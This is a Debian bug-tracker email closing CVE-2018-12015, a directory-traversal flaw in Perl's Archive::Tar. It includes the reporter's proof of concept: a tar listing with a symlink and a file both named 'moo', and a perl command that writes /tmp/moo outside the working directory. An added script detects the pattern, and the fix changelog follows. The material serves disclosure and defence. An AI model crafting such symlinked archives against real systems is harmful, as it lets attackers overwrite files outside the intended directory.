Your message dated Tue, 12 Jun 2018 22:04:09 +0000
with message-id <e1fsrob-00093s...@fasolo.debian.org>
and subject line Bug#900834: fixed in perl 5.24.1-3+deb9u4
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached a proof-of-concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
--
Jakub Wilk
traversal.tar.gz
Description: application/gzip
--- End Message ---
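A pre-extraction check for the pattern the report describes (a symlink entry followed by a regular file with the same name, so the file is written through the link rather than under the working directory), added here as an example; it is not code from the bug report, from Archive::Tar, or from the Debian fix. It assumes a current Archive::Tar with the `full_path`, `is_symlink` and `linkname` accessors on Archive::Tar::File, and builds a constructed in-memory archive of the same shape as the attached PoC instead of reading traversal.tar.gz:

```perl
#!/usr/bin/perl
# Added example (not part of the bug report or the Debian package): scan an
# archive with Archive::Tar and refuse to extract it if any entry would be
# written through a path that an earlier entry declared as a symlink.
use strict;
use warnings;
use Archive::Tar;
use Archive::Tar::Constant qw(SYMLINK);

# Returns a list of findings for an already-read Archive::Tar object; an empty
# list means no entry is written through a symlink and no symlink points
# outside the extraction directory.
sub find_symlink_traversal {
    my ($tar) = @_;
    my @findings;
    my %link_target;   # normalised archive path => link target, symlinks seen so far

    for my $entry ($tar->get_files) {
        my $path = $entry->full_path;
        # Strip leading "./" so "moo" and "./moo" collide the way they do on disk.
        (my $norm = $path) =~ s{^(?:\./)+}{};

        # If any leading component of this path was made a symlink by an earlier
        # entry, the data lands wherever that link points, not under cwd.
        my @parts = split m{/}, $norm;
        for my $i (0 .. $#parts) {
            my $prefix = join '/', @parts[0 .. $i];
            if (exists $link_target{$prefix}) {
                push @findings, sprintf '%s would be written through symlink %s -> %s',
                    $path, $prefix, $link_target{$prefix};
                last;
            }
        }

        if ($entry->is_symlink) {
            my $target = $entry->linkname;
            # An absolute target or a ".." component already leaves the tree.
            if ($target =~ m{^/} || grep { $_ eq '..' } split m{/}, $target) {
                push @findings, sprintf 'symlink %s points outside the extraction directory (%s)',
                    $path, $target;
            }
            $link_target{$norm} = $target;
        }
    }
    return @findings;
}

# Constructed sample with the same shape as the attached PoC: a symlink
# "moo" -> /tmp/moo followed by a regular file "moo". To check a real archive
# use Archive::Tar->new('traversal.tar.gz') in place of this.
my $tar = Archive::Tar->new;
$tar->add_data('moo', '', { type => SYMLINK, linkname => '/tmp/moo' });
$tar->add_data('moo', "moo\n");

my @findings = find_symlink_traversal($tar);
if (@findings) {
    print "refusing to extract:\n", map { "  $_\n" } @findings;
    exit 1;
}
print "no symlink traversal found; safe to call \$tar->extract in the default mode\n";
```

The check is deliberately order-sensitive: tar members are extracted in archive order, so only a symlink that precedes the colliding entry can redirect it. Running the script against the constructed archive reports both the out-of-tree link target and the second "moo" entry being written through it, and exits non-zero before any extraction happens.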
--- Begin Message ---
Source: perl
Source-Version: 5.24.1-3+deb9u4
We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 900...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Dominic Hargreaves <d...@earth.li> (supplier of updated perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sun, 10 Jun 2018 18:37:28 +0100
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.24 libperl-dev perl-modules-5.24 perl
Architecture: all amd64 source
Version: 5.24.1-3+deb9u4
Distribution: stretch-security
Urgency: high
Maintainer: Niko Tyni <nt...@debian.org>
Changed-By: Dominic Hargreaves <d...@earth.li>
Closes: 900834
Description:
libperl5.24 - shared Perl library
libperl-dev - Perl library: development files
perl-base - minimal Perl system
perl-debug - debug-enabled Perl interpreter
perl-doc - Perl documentation
perl - Larry Wall's Practical Extraction and Report Language
perl-modules-5.24 - Core Perl modules
Changes:
perl (5.24.1-3+deb9u4) stretch-security; urgency=high
.
* [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
in Archive-Tar (Closes: #900834)
Checksums-Sha1:
af207347626b1c7c67cfe3694c41500627f82f2c 2393 perl_5.24.1-3+deb9u4.dsc
8b880f01eb868807f669bbc37306b435aeb0fcae 179936 perl_5.24.1-3+deb9u4.debian.tar.xz
efad4d938b9da447909ada8dba9cb509365b69e2 5148 perl_5.24.1-3+deb9u4_source.buildinfo
9d1bcc0c28b32f4e876951a9f0cd08246b5aa5b5 2755282 libperl-dev_5.24.1-3+deb9u4_amd64.deb
735e87412d5cdf6927b302a7245aff00c53b1a62 3522222 libperl5.24_5.24.1-3+deb9u4_amd64.deb
32d7f11f6b90ff202e9a708bda4a7189b39432c7 1344606 perl-base_5.24.1-3+deb9u4_amd64.deb
3eaa55757469bf8d8568391950eb552cd88e8521 6654658 perl-debug_5.24.1-3+deb9u4_amd64.deb
632d982fcdda3d6e65991a75a9fcab4512305c95 7145986 perl-doc_5.24.1-3+deb9u4_all.deb
6daa8b346fdc5377af1b34ba2a221fc756939fe4 2723830 perl-modules-5.24_5.24.1-3+deb9u4_all.deb
a36604cb1399c2afddc5a34f502cffff9e7eca0b 5787 perl_5.24.1-3+deb9u4_amd64.buildinfo
26714cb0a97ff01c13b3802f2ec86ce44163dac7 218478 perl_5.24.1-3+deb9u4_amd64.deb
Checksums-Sha256:
439fd400e8f7659679acac82bb6178c33e1c7cea161210c5051f8c78c2df004b 2393 perl_5.24.1-3+deb9u4.dsc
96b1e96a4ac72bb937f53079806fe0d6127da8fbf40d113d618a240aa378745c 179936 perl_5.24.1-3+deb9u4.debian.tar.xz
3395fefebdc09d87a3b0a5ac5b4b0039ff803d43fd686fa19ba7473688e099fe 5148 perl_5.24.1-3+deb9u4_source.buildinfo
0321c89a988bb0f1430a92943fa1c83e907c74e86b81021b422af34a24a7212c 2755282 libperl-dev_5.24.1-3+deb9u4_amd64.deb
e010ab8e7178c2271033aa199f925f1c2fd46e879d222462eaad35d1f7eaedea 3522222 libperl5.24_5.24.1-3+deb9u4_amd64.deb
914985af488a14268b911de8b06e082165f362e3d3c6a52581aa2619d557e1ea 1344606 perl-base_5.24.1-3+deb9u4_amd64.deb
02e3eb8c853e5caa558512ed6d48d0dcdb9d99692585ebd77fd22ddb62234f91 6654658 perl-debug_5.24.1-3+deb9u4_amd64.deb
a483bc64c3936ce99b3ae76430d644c3c784f879819ef49d74f0d4365b4c3020 7145986 perl-doc_5.24.1-3+deb9u4_all.deb
97ef07235d452887148df4791b24d50af224bebd47e90970d3b26eead718c330 2723830 perl-modules-5.24_5.24.1-3+deb9u4_all.deb
485ed8287ff61c4d1d855c55ca4801cda41106ef9c207411cc62a51a73b26945 5787 perl_5.24.1-3+deb9u4_amd64.buildinfo
9f9829e5a44de48877a8ff172cf1c25aefb2dc23ee8cd508dea7d8a877d4ff30 218478 perl_5.24.1-3+deb9u4_amd64.deb
Files:
45d7c95ff04ee4a8300fdc8515789136 2393 perl standard perl_5.24.1-3+deb9u4.dsc
ab7a46240a333c6891ec737d97a57f3b 179936 perl standard perl_5.24.1-3+deb9u4.debian.tar.xz
bca10b7f8812b1277e723c10c6abb015 5148 perl standard perl_5.24.1-3+deb9u4_source.buildinfo
ba4de357e2e56f6ec5035f004c3a2441 2755282 libdevel optional libperl-dev_5.24.1-3+deb9u4_amd64.deb
09b2d8a4fc06cd455f9937109738be42 3522222 libs optional libperl5.24_5.24.1-3+deb9u4_amd64.deb
50f96a0c7220ef449601b4ac1605ea89 1344606 perl required perl-base_5.24.1-3+deb9u4_amd64.deb
45fa6e304b63e60afc38184266ae76b5 6654658 devel extra perl-debug_5.24.1-3+deb9u4_amd64.deb
65a2e7562defc2f3aa8fa75d7d761e63 7145986 doc optional perl-doc_5.24.1-3+deb9u4_all.deb
9c5837ae2d97e0ae837a6469472b9c4a 2723830 perl standard perl-modules-5.24_5.24.1-3+deb9u4_all.deb
36e7f2b306ed5f05c17d5562e9b0dba2 5787 perl standard perl_5.24.1-3+deb9u4_amd64.buildinfo
1937c69554f677fb5781f5922d22b6a1 218478 perl standard perl_5.24.1-3+deb9u4_amd64.deb
-----BEGIN PGP SIGNATURE-----
iQJBBAEBCAArFiEEy0llJ/kAnyscGnbawAV+cU1pT7IFAlsdai4NHGRvbUBlYXJ0
aC5saQAKCRDABX5xTWlPsldSEACJEFQ4rwkJAS5js3R8XBMhfidxVUGYOkB2jGnk
EFte7lFzVeFk40qPj7hMbGOl5SRyPoBwTwTFu8qdvmwcO05WsP7eIUHeJ5PfAlSm
B1xt7yohK3FkUNT7BEw7fC/6N1exi37JaUg7/N4LcYf5Cyy7Fmn5x909JprU3a8Z
Tk/PBvnhv8pDczK7nPhUdiO60UwXFP7EHbKwnc9UPrCCzFD+0639D0xJOUhqAFoc
sNKNsUbxy/wb1i5PHwsDblIXSAcmUQN/EwWD64UeV5dx/HRlQ8KjH9uVDpg9Wlj4
hSjR6zD6V9YJ5nlr7vdjNFFMyWznHyibOy57iK4O/S1JmxiWo6UUkdERqOD29Uvx
12pUMa0oVHxr/OITc4ZcUbAyzKVdXDKEu5TSPjyvidMHRkVQTybMdfDpTgH3i1k7
LPjrvPKBZrJZmj52RnHQ7pRX8kJoueMS3YoJIrbxHelkGEi33F6njza3lTwLR2xX
Th4Lst8sX0arCK5szpUBpBVJgJA+Ho2dUNvp5Ae2XD/rAfTTZKiYtnUrOFS02xSC
N13F8xIW43qxYR0OS6u7IYWB/BO60WMP3q4BJCdrMUIqBNDVQ3+f8WVJg/auCXLy
lGXCcpuOl0LAetfobn/O9TMoqXcFvZoV1OWfOqMAl/DjghPPtDeQ+Y38iFmcpeY8
8ynVBw==
=0Ojb
-----END PGP SIGNATURE-----
--- End Message ---